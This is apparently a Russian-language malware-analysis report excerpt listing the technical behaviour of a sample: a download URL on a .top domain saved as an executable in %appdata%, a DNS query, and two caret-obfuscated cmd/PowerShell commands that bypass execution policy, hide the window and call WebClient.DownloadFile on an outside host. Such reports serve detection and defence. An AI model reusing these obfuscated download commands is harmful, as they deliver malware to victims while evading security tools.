Техническая информация
- http://zussipussicscds.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^o^W^e^r^S^HE^LL^.ExE -^ExeCUT^io^N^P^ol^i^cy ^BypaSs -No^PRO^FIle ^-W^I^N^Dow^S^tYlE^ H^ID^dEN (Ne^w-^O^BJEcT ^Sy^S^TEm.N^et^.^WEB^Cl^i^enT).^D^oW^NLo^Adf^I^L^e^('http://zus...
- DNS ASK zu####ussicscds.top
- '<SYSTEM32>\cmd.exe' /c "P^o^W^e^r^S^HE^LL^.ExE -^ExeCUT^io^N^P^ol^i^cy ^BypaSs -No^PRO^FIle ^-W^I^N^Dow^S^tYlE^ H^ID^dEN (Ne^w-^O^BJEcT ^Sy^S^TEm.N^et^.^WEB^Cl^i^enT).^D^oW^NLo^Adf^I^L^e^('http://zus...' (со скрытым окном)